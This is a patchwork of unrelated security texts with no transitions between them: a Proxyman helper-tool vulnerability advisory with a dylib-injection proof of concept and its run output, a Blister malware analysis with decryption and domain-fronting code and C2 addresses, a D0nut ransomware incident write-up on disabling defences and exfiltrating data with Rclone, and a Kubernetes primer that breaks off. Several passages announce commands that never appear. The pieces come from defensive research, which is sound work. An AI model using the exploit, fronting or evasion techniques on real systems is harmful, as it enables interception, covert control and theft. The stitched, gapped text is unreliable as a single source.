The Proxyman application affected is a macOS native desktop application used for HTTP(S) proxying. The application distribution includes a helper service tool (com.proxyman.NSProxy.HelperTool) that is used to adjust system proxy settings. The main application communicates with this higher-privilege tool over XPC.
Impact
It is possible for a low-privilege attacker or otherwise malicious process to inconspicuously change the operating system’s HTTP(S) proxy settings, facilitating, e.g., MITM attacks.
Recommendation
Update to HelperTool version 1.5.0 or higher, distributed with the most recent (4.13.0 as of writing) version of Proxyman.
Details
Much of the below is based heavily on previous work by Csaba Fitzl, in particular his blogs which coincided with earlier CVEs:
The HelperTool class’s implemented (BOOL)listener:(NSXPCListener *) shouldAcceptNewConnection:(NSXPCConnection *) instance method defines six code-signing requirement strings. A process attempting to establish a valid XPC connection to the installed com.proxyman.NSProxy.HelperTool must satisfy one of these requirements.
/* @class HelperTool */
-(char)listener:(void *)arg2 shouldAcceptNewConnection:(void *)arg3 {
r14 = self;
rax = [arg3 retain];
r12 = rax;
rdx = [rax processIdentifier];
[r14 setConnectionPID:rdx];
var_60 = @"identifier \"com.proxyman.NSProxy\" and anchor apple generic and certificate leaf[subject.CN] = \"Apple Development: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
*( var_60 + 0x8) = @"identifier \"com.proxyman.NSProxy-setapp\" and anchor apple generic and certificate leaf[subject.CN] = \"Apple Development: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
*( var_60 + 0x10) = @"identifier \"com.proxyman.NSProxy\" and anchor apple generic and certificate leaf[subject.CN] = \"Mac Developer: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
*( var_60 + 0x18) = @"identifier \"com.proxyman.NSProxy-setapp\" and anchor apple generic and certificate leaf[subject.CN] = \"Mac Developer: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
*( var_60 + 0x20) = @"anchor apple generic and identifier \"com.proxyman.NSProxy\" and (certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = \"3X57WP8E8V\")";
*( var_60 + 0x28) = @"anchor apple generic and identifier \"com.proxyman.NSProxy-setapp\" and (certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = \"3X57WP8E8V\")";
rax = [NSArray arrayWithObjects:rdx count:0x6];
rax = [rax retain];
r15 = rax;
rcx = r12;
if ([r14 validateIncomingConnectionForAllCodeSigns:rax forConnection:rcx] != 0x0) {
rax = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol), rcx];
rax = [rax retain];
[r12 setExportedInterface:rax, rcx];
[rax release];
[r12 setExportedObject:r14, rcx];
[r12 resume];
r14 = 0x1;
}
A de-compilation of the listener:shouldAcceptNewConnection: instance method defined six potential security requirements before passing them to the validateIncomingConnectionForAllCodeSigns:forConnection: instance method.
The above de-compilation shows the method grouping the six strings into an NSArray and passing them into the HelperTool‘s validateIncomingConnectionForAllCodeSigns:forConnection: instance method. Looking into this instance method, we find that it will loop through the six code-signing requirement strings, each loop calling, in succession, SecCodeCopyGuestWithAttributes(), SecRequirementCreateWithString, and SecCodeCheckValidityWithErrors to determine that the calling binary is correctly signed and conforms to one of the six allowed requirement strings.
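The acceptance logic described here amounts to an any-of check over the six requirement strings. A minimal model of that control flow, where satisfies() stands in for the Security framework calls named above (SecCodeCopyGuestWithAttributes, SecRequirementCreateWithString, SecCodeCheckValidityWithErrors):

```python
# Minimal model of the any-of code-signing check: accept the XPC
# connection if the caller satisfies any one requirement string.
# satisfies() stands in for the real Security framework validation.
def validate_all_code_signs(requirements, satisfies) -> bool:
    for requirement in requirements:
        if satisfies(requirement):
            return True  # one matching requirement is enough
    return False

requirements = [
    'identifier "com.proxyman.NSProxy" ...',         # truncated examples
    'identifier "com.proxyman.NSProxy-setapp" ...',
]
print(validate_all_code_signs(requirements, lambda r: "setapp" in r))  # -> True
```

The security of the scheme therefore rests entirely on how strict each individual requirement string is, which is what the attack below exploits.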
An attacker able to pass the above security requirement check can communicate with the HelperTool, which is tasked with managing the system’s proxy settings through a series of XPC service methods. Modern distributions of the main Proxyman.app bundle are all signed with the hardened runtime flag, preventing the library injection attacks that would look to take advantage of this. However, an old version of Proxyman that is still available, version 1.3.4, is not signed with any code-signing flags, allowing an attacker to abuse it as a vector through which they can pass the security validation check, communicate with an up-to-date HelperTool distributed with recent versions of Proxyman, and surreptitiously adjust system proxy settings.
An old version of the Proxyman (1.3.4) application was signed without flags to protect against library injections and also contained the requisite TeamIdentifier.
We can determine the exposed XPC service methods using the class-dump tool. Though there are several methods we appear to be able to call, the simplest was legacySetProxySystemPreferencesWithAuthorization:(NSData *) enabled:(BOOL) host:(NSString *) port:(NSString *) reply:(void (^)(NSError *, BOOL)):
XPC service methods exposed by the com.proxyman.NSProxy.HelperTool service
Using this, it is possible to build a dynamic library that can be force-loaded into the old Proxyman application and that will, on startup, call the XPC service and set the system’s proxy settings to attacker-controlled values. Some important code snippets are included below, along with a full proof-of-concept source file.
Once authorization checks were passed, the dynamic library called the legacySetProxySystemPreferencesWithAuthorization and getVersionWithReply instance methods.
Once we compile the dynamic library we can then insert it into the old Proxyman application:
And using the below shell script ($ ./Poc.sh ./ProxyHelper_PoC.dylib <host> <port>), it is possible to execute the proof-of-concept exploitation against a fully updated Proxyman installation, changing the system’s proxy settings:
The exploit script will retrieve the old version of Proxyman, mount it, and inject the compiled dynamic library into it, exploiting the already-installed and up-to-date HelperTool.
$ ./PoC.sh ProxyHelper_PoC.dylib 127.0.0.1 5555
[+] Changing to /var/folders/m5/h5w99qzx1zqdfj_bf8518h8w0000gn/T/
[+] Getting https://github.com/ProxymanApp/Proxyman/releases/download/1.3.4/Proxyman_1.3.4.dmg...
[+] Mounting DMG...
[+] Injecting dylib...
2023-08-31 16:46:38.856 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] obj: <__NSXPCInterfaceProxy_HelperToolProtocol: 0x600002364000>
2023-08-31 16:46:38.857 Proxyman[4504:166167] conn: <NSXPCConnection: 0x600003169e00> connection to service named com.proxyman.NSProxy.HelperTool
2023-08-31 16:46:38.956 Proxyman[4504:166202] [+] Proxy set successfully!
2023-08-31 16:46:38.957 Proxyman[4504:166202] [+] HelperTool Version: 1.4.0
2023-08-31 16:46:39.358 Proxyman[4504:166167] [+] Done.
The exploit succeeded, changing the system’s proxy settings to http(s)://127.0.0.1:5555
With the exploit proof-of-concept successful, it is possible to open an nc listener to catch requests being sent from browsers running on the system:
Blister is a piece of malware that loads a payload embedded inside it. We provide an overview of payloads dropped by the Blister loader based on 137 unpacked samples from the past one and a half years and take a look at recent activity of Blister. The overview shows that since its support for environmental keying, most samples have this feature enabled, indicating that attackers mostly use Blister in a targeted manner. Furthermore, there has been a shift in payload type from Cobalt Strike to Mythic agents, matching with previous reporting. Blister drops the same type of Mythic agent which we thus far cannot link to any public Mythic agents. Another development is that its developers started obfuscating the first stage of Blister, making it more evasive. We provide YARA rules and scripts [1] to help analyze the Mythic agent and the packer we observed with it.
Recap of Blister
Blister is a loader that loads a payload embedded inside it and in the past was observed with activity linked to Evil Corp [2,3]. Matching with public reporting, we have also seen it as a follow-up in SocGholish infections. In the past, we observed Blister mostly dropping Cobalt Strike beacons, yet current developments show a shift to Mythic agents, another red teaming framework.
Elastic Security first documented Blister in December 2021 in a campaign that used malicious installers [4]. It used valid code signatures referencing the company Blist LLC to pose as a legitimate executable, likely leading to the name Blister. That campaign reportedly dropped Cobalt Strike and BitRat.
In 2022, Blister moved to solely using the x86-64 instruction set, whereas it previously included 32-bit builds as well. Furthermore, Red Canary reported observing SocGholish dropping Blister [5], which was later confirmed by other vendors as well [6].
In August the same year, we observed a new version of Blister. This update included more configuration options, along with an optional domain hash for environmental keying, allowing attackers to deploy Blister in a targeted manner. Elastic Security recently wrote about this version [7].
2023 initially did not bring new developments for Blister. However, similar to its previous update, we observed development activity in August. Notably, we saw samples with added obfuscation to the first stage of Blister, i.e. the loader component that is injected into a legitimate executable. Additionally, in July, Unit 42 [8] observed SocGholish dropping Blister with a Mythic agent.
In summary, 2023 brought new developments for Blister, with added obfuscations to the first stage and a new type of payload. The remainder of this blog is divided into two parts: first, we look back at previous Blister payloads and configurations; second, we discuss the recent developments.
Looking back at Blister
In early 2023, we observed a SocGholish infection at our security operations center (SOC). We notified the customer and were given a binary that was related to the infection. This turned out to be a Blister sample, with Cobalt Strike as its payload.
We wrote an extractor that worked on the sample encountered at the SOC, but it did not work for certain other Blister samples. It turned out that the sample from the SOC investigation belonged to a version of Blister that was introduced in August 2022, while older samples had a different configuration. After writing an extractor for these older versions, we made an overview of what Blister had been dropping in roughly the past two years.
The samples we analyzed are all available on VirusTotal, the platform we used to find samples. We focus on 64-bit Blister samples; as far as we know, newer samples no longer use 32-bit. In total, we found 137 samples we could unpack: 33 samples with the older version and 104 samples with the newer version from 2022.
In the Appendix, we list these samples, where version 1 and 2 refer to the old and new version respectively. The table is sorted by the first-seen date of a sample in VirusTotal, where one can clearly see the introduction of the update.
Because we want to keep the tables comprehensible, we have split up the data into four tables. For now, it is important to note that Table 2 provides information per Blister sample we unpacked, including the date it was first uploaded to VirusTotal, the version, the label of the payload it drops, the type of payload, and two configuration flags. Furthermore, to have a list of Blister and payload hashes in clear text in the blog, we included these in Table 6. We also included a more complete data set at https://github.com/fox-it/blister-research.
Discussing payloads
Looking at the dropped payloads, we see that they mostly conform with what has already been reported. In Figure 1, we provide a timeline based on the first seen date of a sample in VirusTotal and the family of the payload. The observed payloads consist of Cobalt Strike, Mythic, Putty, and a test application. Initially, Blister dropped various flavors of Cobalt Strike and later dropped a Mythic agent, which we refer to as BlisterMythic. Recently, we also observed a packer that unpacks BlisterMythic, which we refer to as MythicPacker. Interestingly, we did not observe any samples dropping BitRat.
Figure 1, Overview of Blister samples we were able to unpack, based on the first seen date reported in VirusTotal.
From the 137 samples, we were able to retrieve 74 unique payloads. This discrepancy between the number of unique Blister samples and unique payloads is mainly caused by various Blister samples dropping the same Putty or test application, namely 18 and 22 samples, respectively. This summer has shown a particular increase in test payloads.
Cobalt Strike
Cobalt Strike was dropped through three different types of payloads: generic shellcode, DLL stagers, or obfuscated shellcode. In total, we retrieved 61 beacons; in Table 1, we list the Cobalt Strike watermarks we observed. A watermark is a unique value linked to a license key. It should be noted that Cobalt Strike watermarks can be changed and hence are not a sound way to identify clusters of activity.
Watermark (decimal)    Watermark (hexadecimal)    Nr. of beacons
206546002              0xc4fa452                  2
1580103824             0x5e2e7890                 21
1101991775             0x41af0f5f                 38
Table 1, Counted Cobalt Strike watermarks observed in beacons dropped by Blister.
The watermark 206546002, though only used twice, shows up in other reports as well, e.g. a report on an Emotet intrusion [9] and reports linking it to Royal, Quantum, and Play ransomware activity [10,11]. The watermark 1580103824 is mentioned in reports on Gootloader [12], but also Cl0p [13], and is the 9th most common beacon watermark based on our dataset of Cobalt Strike beacons [14]. Interestingly, 1101991775, the watermark that is most common in our set, is not mentioned in public reporting as far as we can tell.
Cobalt Strike profile generators
In Table 3, we list information on the extracted beacons, including the submission path. Most of the submission paths contain /safebrowsing/ and /rest/2/meetings, matching with paths found in SourcePoint [15], a Cobalt Strike command-and-control (C2) profile generator. This only holds, however, for the regular shellcode beacons; the obfuscated shellcode and the DLL stager beacons appear to use a different C2 profile. The C2 profiles for these payloads match another public C2 profile generator [16].
Domain fronting
Some of the beacons are configured to use “domain fronting”, which is a technique that allows malicious actors to hide the true destination of their network traffic and evade detection by security systems. It involves routing malicious traffic through a content delivery network (CDN) or other intermediary server, making it appear as if the traffic is going to a legitimate or benign domain, while in reality, it’s communicating with a malicious C2 server.
Certain beacons have subdomains of fastly[.]net as their C2 server, e.g. backend.int.global.prod.fastly[.]net or python.docs.global.prod.fastly[.]net. However, the domains they connect to are admin.reddit[.]com or admin.wikihow[.]com, which are legitimate domains hosted on a CDN.
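To make the mechanics concrete, the sketch below builds a fronted HTTP request in Python. Which value ends up in the SNI versus the Host header depends on the beacon's malleable profile, so the domain pairing and the request path here are purely illustrative:

```python
# Illustrative sketch of domain fronting via a Fastly-style CDN: the
# outer TCP/TLS connection (and SNI) targets a benign domain served by
# the CDN, while the Host header inside the encrypted tunnel routes the
# request to the actor's backend service on the same CDN.
def build_fronted_request(outer_domain: str, inner_host: str,
                          path: str = "/") -> tuple:
    request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {inner_host}\r\n"    # only visible after TLS decryption
        "Connection: close\r\n"
        "\r\n"
    ).encode()
    return outer_domain, request     # connect to outer_domain, send request

outer, req = build_fronted_request(
    "admin.wikihow.com",                    # benign, CDN-hosted domain
    "python.docs.global.prod.fastly.net",   # actor's CDN backend
)
```

Network monitoring that only inspects the connected domain or SNI sees the benign domain; the true destination is only recoverable from the decrypted Host header.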
Obfuscated shellcode
In five cases, we observed Blister drop Cobalt Strike by first loading obfuscated shellcode. We included a YARA rule for this particular shellcode in the Appendix.
Performing a retrohunt on VirusTotal yielded only 12 samples, with names indicating potential test files and at least one sample dropping Cobalt Strike. We are unsure whether this is an obfuscator solely used by Evil Corp or whether it is used by other threat actors as well.
Figure 2, Layout of particular shellcode, with denoted steps.
The shellcode is fairly simple; we provide an overview of it in Figure 2. The entrypoint is at the start of the buffer, which calls into the decoding stub. This call instruction automatically pushes the next instruction’s address onto the stack, which the decoding stub uses as the starting point for mutating memory. Figure 3 shows some of these instructions, which are quite distinctive.
Figure 3, Decoding instructions observed in particular shellcode.
At the end of the decoding stub, execution either jumps or calls back and then invokes the decryption function. This decryption function uses RC4, but the S-box is already initialized, so no key-scheduling algorithm is implemented. Lastly, it jumps to the final payload.
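Because the S-box ships pre-initialized inside the shellcode, decryption reduces to RC4's output-generation loop (the PRGA). A minimal Python equivalent, with the embedded 256-byte S-box passed in directly:

```python
def rc4_prga_decrypt(sbox: list, data: bytes) -> bytes:
    """Run only RC4's PRGA over `data`, starting from a pre-built S-box.

    The key-scheduling algorithm (KSA) is skipped entirely, mirroring the
    shellcode, which embeds the already-initialized 256-byte S-box.
    """
    S = list(sbox)           # work on a copy; the PRGA mutates the S-box
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)
```

Running the standard KSA separately and feeding its S-box into this function reproduces ordinary RC4, which is a convenient way to validate an S-box carved out of a sample.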
BlisterMythic
Matching with what was already reported by Unit 428, Blister recently started using Mythic agents as its payload. Mythic is one of the many red teaming frameworks on GitHub18. It supports various agents, which are listed on GitHub as well19 and can roughly be compared to a Cobalt Strike beacon. It is possible to write your own Mythic agent, as long as you comply with a set of constraints. Thus far, we keep seeing the same Mythic agent, which we discuss in more detail later on. The first sample dropping Mythic agents was uploaded to VirusTotal on July 24th 2023, just days before initial reports of SocGholish infections leading to Mythic. In Table 4, we provide the C2 information from the observed Mythic agents.
We observed Mythic either as a Portable Executable (PE) or as shellcode. The shellcode seems to be rare and unpacks a PE file which, in our experience, has thus far always resulted in a Mythic agent. We discuss this packer later on as well and provide scripts that help with retrieving the PE file it packs. We refer to this specific Mythic agent as BlisterMythic and to the packer as MythicPacker.
In Table 5, we list the BlisterMythic C2 servers we were able to find. Interestingly, the domains were all registered at DNSPod. We also observed this in the past with Cobalt Strike domains we linked to Evil Corp. Apart from this, we also see similarities in the domain names used, e.g. domains consisting of two or three words concatenated to each other and using com as top-level domain (TLD).
Test payloads
Besides red team tooling like Mythic and Cobalt Strike, we also observed Putty and a test application as payloads. Running Putty through Blister does not seem logical and is likely linked to testing. It would only result in Putty not touching the disk and running in memory, which in itself is not useful. Additionally, when we look at the domain hashes in the Blister samples, only the Putty and test application samples in some cases share their domain hash.
Blister configurations
We also looked at the configurations of Blister, from which we can to some extent derive how attackers use it. Note that the collection also contains “test samples” from the attacker. Besides the more obvious Putty and test application, some samples that dropped Mythic, for instance, could also be linked to testing. We chose to leave out samples that drop Putty or the test application, leaving 97 samples in total. This means that the samples paint a partly biased picture, though we think it is still valuable and provides a view into how Blister is used.
Environmental keying
Since its update in 2022, Blister includes an optional domain hash, which it computes over the DNS search domain of the machine (ComputerNameDnsDomain). It only continues executing if the hash matches the one in its configuration, enabling environmental keying.
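The keying logic amounts to a simple gate, sketched below. The hash function is a stand-in: FNV-1a is used here for illustration only, since Blister implements its own hashing routine, and the lowercasing of the domain string is also an assumption.

```python
# Sketch of Blister-style environmental keying. FNV-1a stands in for
# Blister's actual (different) hash; the normalisation is an assumption.
def fnv1a32(data: bytes) -> int:
    h = 0x811C9DC5
    for b in data:
        h = ((h ^ b) * 0x01000193) & 0xFFFFFFFF
    return h

def should_execute(dns_search_domain: str, configured_hash: int) -> bool:
    # The sample only detonates when the victim's DNS search domain
    # (ComputerNameDnsDomain) hashes to the value in its configuration.
    return fnv1a32(dns_search_domain.lower().encode()) == configured_hash
```

Because only the hash is embedded, analysts without knowledge of the target domain cannot trivially brute-force the expected environment, which is the point of the technique.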
By looking at the number of samples that have domain hash verification enabled, we can say something about how Blister is deployed. Of the 66 Blister samples, only 6 did not have domain hash verification enabled. This indicates it is mostly used in a targeted manner, corresponding, for example, with using SocGholish for initial access and reconnaissance before deploying Blister.
Persistence
Of the 97 samples, 70 have persistence enabled. For persistence, Blister still uses the same method as described by Elastic Security20: it mostly uses the IFileOperation COM interface to copy rundll32.exe and itself to the Startup folder. This is significant for detection, as it means that these operations are performed by the DllHost.exe process, not by the rundll32.exe process that hosts Blister.
Blister trying new things
Blister’s previous update altered the core payload; however, the loader that is injected into the legitimate executable remained unchanged. In August this year, we observed experimental samples on VirusTotal with an obfuscated loader component, hinting at developer activity. Interestingly, we could link these samples to another sample on VirusTotal which solely contained the function body of the loader, and to yet another sample that contained a loader with a large set of INT 3 instructions added to it. Perhaps the developer was experimenting with different mutations to see how they influence the detection rate.
Obfuscating the first stage
Recent samples from September 2023 have the loader obfuscated in the same manner, with bogus instructions and excessive jump instructions. These changes make it harder to detect Blister using YARA, as the loader instructions are now intertwined with junk instructions and sometimes are followed by junk data due to the added jump instructions.
Figure 4, Comparison of two loader components from recent Blister samples, left is without obfuscation and right is with obfuscation.
In Figure 4, we compare the two function bodies of the loader: one body as normally seen in Blister samples and one obfuscated function body, observed in the recent samples. The comparison shows that naïve YARA rules are less likely to trigger on the obfuscated function body. In the Appendix, we provide a Blister rule that tries to detect these obfuscated samples. The added bogus instructions include btc, bts, lahf and cqo, instructions we have also observed in the Blister core before; see, for example, the core component of SHA256 4faf362b3fe403975938e27195959871523689d0bf7fba757ddfa7d00d437fd4.
Dropping Mythic agents
Apart from an obfuscated loader, Mythic agents currently are the payload of choice. In September and October, we found obfuscated Blister samples only dropping Mythic. Certain samples have low or zero detections on VirusTotal21 at the time of writing, showing that obfuscation does pay off.
We now discuss one sample22 that drops a shellcode eventually executing a Mythic agent. The shellcode unpacks a PE file and executes it. We provide a YARA rule for this packer in the Appendix, which we refer to as MythicPacker. Based on this rule, we did not find other samples, suggesting it is a custom packer. Until now, we have only seen this packer unpacking Mythic agents.
The dropped Mythic agents are all similar and we cannot link them to any public agents thus far. This could mean that Blister developers created their own Mythic agent, though this is uncertain. We provide a YARA rule that matches on all agents we encountered; a VirusTotal retrohunt over the past year resulted in only four samples, all linked to Blister. We therefore think this Mythic agent is likely custom-made.
Figure 5, BlisterMythic configuration decryption.
The agents all share a similar structure, namely an encrypted configuration in the .bss section of the executable. The configuration is decrypted by XORing with a key derived from the size of the configuration and a constant that appears to differ per sample. For PE files, we have a Python script that can decrypt a configuration. Figure 5 shows this decryption loop, where the XOR constant is 0x48E12000.
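A hedged sketch of this decryption, assuming the key is simply the configuration size XORed with the per-sample constant and applied per 32-bit word; the real key derivation may differ between samples (0x48E12000 is the constant from the sample shown in Figure 5):

```python
import struct

def decrypt_config(blob: bytes, xor_const: int = 0x48E12000) -> bytes:
    # Derive a 32-bit key from the configuration size and the per-sample
    # constant, then XOR it over the blob one little-endian dword at a time.
    key = (len(blob) ^ xor_const) & 0xFFFFFFFF
    padded = blob.ljust((len(blob) + 3) & ~3, b"\x00")  # align to 4 bytes
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", padded):
        out += struct.pack("<I", word ^ key)
    return bytes(out[: len(blob)])
```

Since XOR is its own inverse, the same routine both encrypts and decrypts a blob of a given size.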
Figure 6, Decrypted BlisterMythic configuration
Dumping the configuration results in a binary blob that contains various information, including the C2 server. Figure 6 shows a hexdump of a snippet from the decrypted configuration. We created a script to dump the decrypted configuration of the BlisterMythic agent in PE format and also a script that unpacks MythicPacker shellcode and outputs a reconstructed PE file, see https://github.com/fox-it/blister-research.
Conclusion
In this post, we provided an overview of observed Blister payloads from the past one and a half years on VirusTotal and also gave insight into recent developments. Furthermore, we provided scripts and YARA rules to help analyze Blister and the Mythic agent it drops.
From the analyzed payloads, we see that Cobalt Strike was the favored choice, but that lately it has been replaced by Mythic. Cobalt Strike was mostly dropped as shellcode and occasionally via obfuscated shellcode or a DLL stager. Apart from Cobalt Strike and Mythic, we saw that Blister test samples are uploaded to VirusTotal as well.
The custom Mythic agent, together with the obfuscated loader, represents the new Blister developments of the past months. It is likely that its developers were aware that the loader component was still a weak spot in terms of static detection. Additionally, throughout the years, Cobalt Strike has received a lot of attention from the security community, with config dumpers and C2 feeds readily available. Mythic is not as popular and allows you to write your own agent, making it an appropriate replacement for now.
Unveiling the Dark Side: A Deep Dive into Active Ransomware Families
Author: Ross Inman (@rdi_x64)
Introduction
Our technical experts have written a blog series focused on the Tactics, Techniques and Procedures (TTPs) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.
In case you missed it, last time we analysed an Incident Response engagement involving BlackCat Ransomware. In this instalment, we take a deeper dive into the D0nut extortion group.
The D0nut extortion group was first reported in August 2022 for breaching networks and demanding ransoms in return for not leaking stolen data. A few months later, reports were released of the group utilizing encryption as well as data exfiltration, with speculation that the ransomware deployed by the group was linked to HelloXD ransomware. There are also suspected links between D0nut affiliates and both the Hive and Ragnar Locker ransomware operations.
Summary
Tl;dr
This post explores some of the TTPs employed by a threat actor who was observed deploying D0nut ransomware during an incident response engagement.
Below is a summary of the findings presented in this blog post:
Heavy use of Cobalt Strike Beacons to laterally move throughout the compromised network.
Deployment of SystemBC to establish persistence.
Modification of a legitimate GPO to disable Windows Defender across the domain.
Leveraging a vulnerable driver (BYOVD) to terminate system-level processes which may interfere with the deployment of ransomware.
Use of RDP to perform lateral movement and browse folders to identify data for exfiltration.
Data exfiltration over SFTP using Rclone.
Deployment of D0nut ransomware.
D0nut
D0nut leaks is a group that emerged during Autumn of 2022 and was initially reported to be performing intrusions into networks with an aim of exfiltrating data which they would then hold to ransom, without encrypting any files1. Further down the line, the group were seen adopting the double-extortion approach2. This includes encrypting files and holding the decryption key for ransom, as well as threatening to publish the stolen data should the ransom demand not be met.
Numerous potential links have been made to other ransomware groups and affiliates, with the ransomware encryptor reportedly sharing similarities with the HelloXD ransomware strain. Indications of a link were observed through the filenames of the ransomware executable deployed throughout the incident, with the filenames being xd.exe and wxd7.exe. However, it should be noted that this alone is not compelling evidence to indicate a link between the ransomware strains.
Incident Overview
Once the threat actor had gained their foothold within the network, they conducted lateral movement with a focus on the following objectives:
Compromise a host which stores sensitive data which can be targeted for exfiltration.
Compromise a domain controller.
Cobalt Strike was heavily utilised to deploy Beacon, the payload generated by Cobalt Strike, to multiple hosts on the network so the threat actor could extend their access and visibility.
A Remote Desktop Protocol (RDP) session was established to a file server, which allowed the threat actor to browse the file system and identify folders of interest to target for exfiltration. Data exfiltration was conducted using Rclone to upload files to a Secure File Transfer Protocol (SFTP) server controlled by the threat actor. Rclone allows for uploading of files directly from folders to cloud storage, meaning the threat actor did not need to perform any data staging prior to the upload.
Before deploying the ransomware, the threat actor deployed malware capable of leveraging a driver, which has been used by other ransomware groups3, to terminate any anti-virus (AV) or endpoint detection and response (EDR) processes running on the system; this technique is known as bring your own vulnerable driver (BYOVD). Additionally, the threat actor modified a pre-existing group policy object (GPO) and appended configuration that would prevent Windows Defender from interfering with any malware that was dropped on the systems.
Ransomware was deployed to both user workstations and servers on the compromised domain. An ESXi server was also impacted, resulting in the hosted virtual machines suffering encryption that was performed at the hypervisor level.
The total time from initial access to encryption is believed to be less than a week.
TTPs
Lateral Movement
The following methods were utilised to move laterally throughout the victim network:
Cobalt Strike remotely installed temporary services on targeted hosts which executed Beacon, triggering a call back to the command and control (C2) server and providing the operator access to the system. An example command line of what the services were configured to run is provided below:
A service was installed in the system.
Service Name: <random alphanumeric characters>
Service File Name: \\<target host>\ADMIN$\<random alphanumeric characters>.exe
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem
RDP sessions were established using compromised domain accounts.
PsExec was also used to facilitate remote command execution across hosts.
Persistence
The threat actor used SystemBC to establish persistence within the environment. The malware was set to execute whenever a user logs in to the system, which was achieved by modifying the registry key Software\Microsoft\Windows\CurrentVersion\Run within the DEFAULT registry hive (please note this is not referring to the hive located at C:\Users\DEFAULT\NTUSER.dat, but the hive located at C:\Windows\System32\config\DEFAULT). An entry was created under the run key which ran the following command, resulting in execution of SystemBC:
As part of their efforts to evade interference from security software, the threat actor made use of two files, d.dll and def.exe, which were responsible for dropping the vulnerable driver RTCore64.sys, which has reportedly been exploited by other ransomware groups to disable AV and EDR solutions. The files were dropped in the following folders:
C:\temp\
C:\ProgramData\
Analysis of def.exe identified that the program escalated privileges via process injection, allowing it to terminate any system-level processes not present in its internally stored whitelist.
The threat actor took additional measures by appending registry configurations to a pre-existing GPO that would disable the detection and prevention functionality of Windows Defender. Exclusions for all files with a .exe or .dll extension were also set, along with exclusions for files within the C:\ProgramData\ and C:\ directories. The below configuration was applied across all hosts present on the compromised domain:
Command and Control
Cobalt Strike Beacons were heavily utilised to maintain a presence within the network and to extend access via lateral movement.
SystemBC was also deployed sparingly and appeared to be purely for establishing persistence within the network. SystemBC is a commodity malware backdoor which leverages SOCKS proxying for covert channelling of C2 communications to the operator. Serving as a proxy, SystemBC becomes a conduit for other malware deployed by threat actors to tunnel C2 traffic. Additionally, certain variants facilitate downloading and execution of further payloads, such as shellcode or PowerShell scripts issued by the threat actor.
Analysis of the executable identified the following IP addresses which are contacted on port 4001 to establish communications with the C2 server:
85.239.52[.]7
194.87.111[.]29
Exfiltration
Rclone, an open-source file management program for cloud storage heavily favoured by threat actors to perform data exfiltration, was deployed once the threat actor had identified a system which hosted data of interest. Through recovering the Rclone configuration file located at C:\Users\<user>\AppData\Roaming\rclone.conf, the SFTP server 83.149.93[.]150 was identified as the destination of the exfiltrated data.
Initially deployed as rclone.exe, the threat actor swiftly renamed the file to explorer.exe in an attempt to blend in. However, due to the file residing in the File Server Resource Manager (FSRM) folder C:\StorageReports\Scheduled\, this artefact was highly noticeable.
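Since rclone.conf is a plain INI file, recovered copies can be triaged quickly. A small helper is sketched below; the remote name and host in the example are made up for illustration:

```python
import configparser

def list_rclone_remotes(conf_text: str) -> list:
    """Return (remote_name, backend_type, host) for each configured remote."""
    parser = configparser.ConfigParser()
    parser.read_string(conf_text)
    return [
        (section,
         parser.get(section, "type", fallback="?"),
         parser.get(section, "host", fallback="-"))
        for section in parser.sections()
    ]

# Example shape of a recovered config (values are made up):
sample = """
[exfil]
type = sftp
host = 203.0.113.10
user = backup
"""
print(list_rclone_remotes(sample))  # → [('exfil', 'sftp', '203.0.113.10')]
```

Surfacing every configured backend and endpoint in one pass helps identify exfiltration destinations to block and hunt for across the estate.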
Impact
Ransomware was deployed to workstations and servers once the threat actor had exfiltrated data from the network to use as leverage in the forthcoming ransom demands. The ransomware also impacted an ESXi server, encrypting the hosted virtual machines at the hypervisor level.
Volume shadow copies for a data drive of a file server were purged by the threat actor preceding the ransomware execution.
The ransomware was downloaded and executed via the following PowerShell command:
In some other instances, the ransomware was deployed as wxd7.exe. The ransomware executables were observed being executed from the following locations (however it is likely that the folders may vary from case to case and the threat actor uses any folders in the root of C:\):
C:\Temp\
C:\ProgramData\
C:\storage\
C:\StorageReports\
During analysis of the ransomware executable, the following help message was derived which provides command line arguments for the program:
A fairly unique ransom note is dropped after the encryption process in the form of an HTML file named readme.html:
Recommendations
Ensure that both online and offline backups are taken and test the backup plan regularly to identify any weak points that could be exploited by an adversary.
Hypervisors should be isolated by placing them in a separate domain or by adding them to a workgroup, to ensure that any compromise of the domain in which the hosted virtual machines reside does not pose a risk to the hypervisors.
Restrict internal RDP and SMB traffic so that only hosts that are required to communicate via these protocols are allowed to.
Monitor firewalls for anomalous spikes in data leaving the network.
Apply Internet restrictions to servers so that they can only establish external communications with known good IP addresses and domains that are required for business operations.
If you have been impacted by D0nut, or currently have an incident and would like support, please contact our Cyber Incident Response Team on +44 331 630 0690 or email [email protected].
Kubernetes is essentially a framework of various services that make up its typical architecture, which can be divided into two roles: the control-plane, which serves as a central control hub and hosts most of the components, and the nodes or workers, where containers and their respective workloads are executed.
Within the control plane we typically find the following components:
kube-apiserver: This component acts as the brain of the cluster, handling requests from clients (such as kubectl) and coordinating with other components to ensure their proper functioning.
scheduler: Responsible for determining the appropriate node to deploy a given pod to.
control manager: Manages the status of nodes, jobs or service accounts.
etcd: A key-value store that stores all cluster-related data.
Inside the nodes we typically find:
